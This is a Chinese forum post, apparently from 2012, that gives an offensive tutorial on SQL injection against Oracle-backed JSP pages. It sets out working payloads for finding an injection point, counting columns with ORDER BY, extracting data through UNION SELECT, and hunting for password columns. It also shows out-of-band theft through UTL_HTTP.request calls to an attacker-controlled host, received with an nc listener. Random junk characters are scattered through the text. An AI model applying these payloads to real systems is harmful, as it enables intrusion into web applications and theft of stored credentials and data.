四 真实世界里的注射 * n- s- E! ]! j4 G* e4 D* O; K
那么一个真实世界的注射应该是个什么样子呢?让我们试试如何从注射点来获得一个shell:) 1 U: L2 ]- l( |3 A* Y; T
9 r, H% V- G4 b# o5 z# k 首先,我们找到一个可能存在注射的页面,list.jsp?username=loveshell,我们添加一个’结果出错了,通过爆出的错误知道这是一个oracle的后台数据库,如含有ORA-xxxx这样的都是oracle,然后用语句: list.jsp?username=loveshell’ and ’’||’1’=’1 正常
1 ~( a) X& {: z$ P list.jsp?username=loveshell’ and ’’||’2’=’1 返回空 / _; E& I" M1 l- a! \
list.jsp?username=loveshell’-- 9 L) D$ [- o& W9 m, z
这样可以知道是一个oracle的字符类型的注射点,那么我们就可以用这种方式插入自己的SQL语句了 list.jsp?username=loveshell’ and [我们的sql语句] – # z9 } b2 }: m, y, U8 l: i
( L8 M) ^& Q" ]* k8 K( p% R( B% y
这个时候我们就可以根据自己的目标考虑后续的入侵思路了,一种是向web方向发展,通过查询数据库的信息来渗透web,一种就是直接入侵数据库,当然,最完美的情况下是oracle和web是一台机器。先说说如何查询数据库里存储的信息吧!要想取得信息就要将信息反馈回来,一种是利用 union查询,譬如这里我们的入侵手法类似于下面: list.jsp?username=loveshell’ order by 10 -- 错误,如果错误信息被反馈的话应该会出现xx coloum不存在之类的,字段数小于10 2 V. s- v/ _' R% L A
list.jsp?username=loveshell’ order by 5 -- 正常显示,字段数大于5
0 X. c2 n4 J0 B: A( q( h
3 q* e; K" x7 S* N2 }4 g 最后发现到order by 8的时候错误,order by 7 就正常,说明是7个字段。注意这里,一般的时候,页面的逻辑很简单,所以可以这样order by猜测,但是如果这个参数进入了2个以上sql语句,里面结果的字段数不一,就难用这种方法了,当然,如果进入2个以上Sql语句的话,估计union 查询也无法使用了,因为sql语句的前后字段数会不一,无法满足条件,后面我们将说到一种万能的获取数据的方法,这里先说比较直观的union查询。 3 j" F( K5 @3 \, W
. _7 I7 D+ v% w
list.jsp?username=loveshell’ union select NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 用7个NULL来匹配对应的字段不会出现字段类型不一的情况,与mysql不同,后面的select语句必须加一个存在的表,这里是dual。 ; T% g, V( y( V" A
- {0 q4 P9 M# t) ~3 s3 n) N 这里正常返回,然后我们就可以继续了,寻找的用做信息反馈的字段需要满足我上面在基本思路里的几个条件。 list.jsp?username=loveshell’ and 1=2 union select 1,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 正常 " m7 m: H& f4 a# H7 p1 H1 y
list.jsp?username=loveshell’ and 1=2 union select 1,2,NULL,NULL,NULL,NULL,NULL from dual-- 错误,第二个字段不是数字类型
$ Y$ H1 Q2 B5 v6 ~6 n1 B list.jsp?username=loveshell’ and 1=2 union select 1,’2’,NULL,NULL,NULL,NULL,NULL from dual-- 错误,第二个字段不是字符类型 0 \$ S! c% c) C8 D# i9 H
这种情况是可能的,因为字段里还包括其他的如日期等类型,这种类型对于我们反馈信息没什么用,所以用NULL直接跳过。
$ D& l+ p/ ]* c, Z0 w4 V# R# Y7 ?! L, n2 f
list.jsp?username=loveshell’ and 1=2 union select 1,NULL,’3’,NULL,NULL,NULL,NULL from dual-- 这个时候正常了,而且在页面的对应的位置显示了,这个字段正是我们要找的。有的时候如果想看某个数字是多少怎么办呢?譬如想看记录的条数,直接二分法是可以的,但是直接显示出来还是比较直观,譬如想看dba_tables的记录数 list.jsp?username=loveshell’ and 1=2 union select 1,to_char((select count(*) from dba_tables),’0000000’),NULL,NULL,NULL,NULL,NULL from dual—
4 u5 t( ]% h% o/ N+ ]+ l5 ]( f" u8 c; }
当然还有其他to_系列函数,间接实现其他数据库里的自动转换。这个字段在页面显示并且也足够长,放得下我们的数据,所以我们就可以充分利用这个字段来进行查询了,譬如获得系统的版本信息可以用
: G# z5 J4 X) ^0 O9 ]: f7 \2 x; E }. G4 O2 t3 ]' U& |
list.jsp?username=loveshell’ and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),NULL,NULL,NULL,NULL,NULL from dual--
7 X) h8 ?9 b" Y; q" Z 如果不能使用union,也没有关系,只要是oracle数据库,我们一样可以把信息给返回来,不用经典查询那么悲观,首先本地用nc -l -vv -p 9999,然后就可以很简单地用 4 ]2 i0 q1 J& G& K) t
" |7 K# }9 A+ n8 {5 \7 } list.jsp?username=loveshell’ and UTL_HTTP.request(’http://www.loveshell.net:9999/’||(select banner from sys.v_$version where rownum=1))=1--
* @6 n0 @4 o6 x% ~3 ~+ u0 B 这个时候loveshell.net的9999端口就应该返回sys.v_$version的banner了,就是数据库的版本,我们还获得了数据库所在网络的 ip,呵呵,另外还知道数据库是否允许外连等信息。这里使用子查询来获得数据,Oracle没有limit这样的语句所以可以用where rownum=1来返回第一条数据。但是如果想知道其他某一条记录怎么办呢?直接rownum=2是不行的,这里可以再次嵌套一个子查询。
2 _, N) f, `! ~$ a7 X: N/ a 5 r* [! A- i& D( L$ |8 W
list.jsp?username=loveshell’ and UTL_HTTP.request(’http://www.loveshell.net:9999/’||(select data from (select rownum as limit,banner as data from sys.v_$version) where limit =2)=1-- % ]1 [- c! j2 r& e9 S1 u+ o
这样就可以得到第二条记录了,灵活运用可以很快取得需要的数据。
) a& f; n* ]$ l; d% p, q; T& i2 n8 G; n1 ` ^. M
其他的如后台的帐户什么的都可以这样返回来。这种数据的窃取手段适用于update和insert等等一切可以使用函数的地方:),如果不确信存不存在UTL_HTTP包,可以用语句select count(*) from all_objects where object_name=’UTL_HTTP’来判断了,注意,在系统表里的数据是大小写敏感的,但是关键字本身是大小写不敏感的。另外某些少数主机也是没有配置dns或者不能上网,没有配置dns的话可以通过用ip访问的方法来测试,不能上网的就要用其他方法了。
+ g* [) N3 ~" d+ S% O8 Y4 d" n$ Y; W5 Q
能获取数据了,我们继续向web的后台靠拢,如果我们知道了后台的地址但是没有密码,我们就可以通过查询系统表来找找敏感字段如passwd在哪,然后用上面的信息窃取手段给弄回来。all_tables包含了所有的表的信息,想找有包含passwd的字段在哪就可以用 all_tab_columns: / ]- c& G9 u! b; a
. Y* a9 r) d; g2 W0 }( `, C4 x8 I+ a
list.jsp?username=loveshell’ and 1=2 union select 1,NULL,(select table_name||chr(35)||column_name from all_tab_columns where column_name like ’%25PASS%25’ and ROWNUM=1),NULL,NULL,NULL,NULL from dual— 1 {2 k! B' z% u8 @8 |
( G; C& n' ]& }3 _0 R4 d
其中的%25为%的转码,这样就能获得我们需要的敏感数据了,另外注意在oracle的系统表里数据都是大写的,所以用PASS而不是 pass,或者用函数转成小写也可以,如lower(column_name) like ’%25pass%25’,进入web后台后可以继续通过后台的功能进行渗透了。 |
发表于 2012-8-4 14:06:19
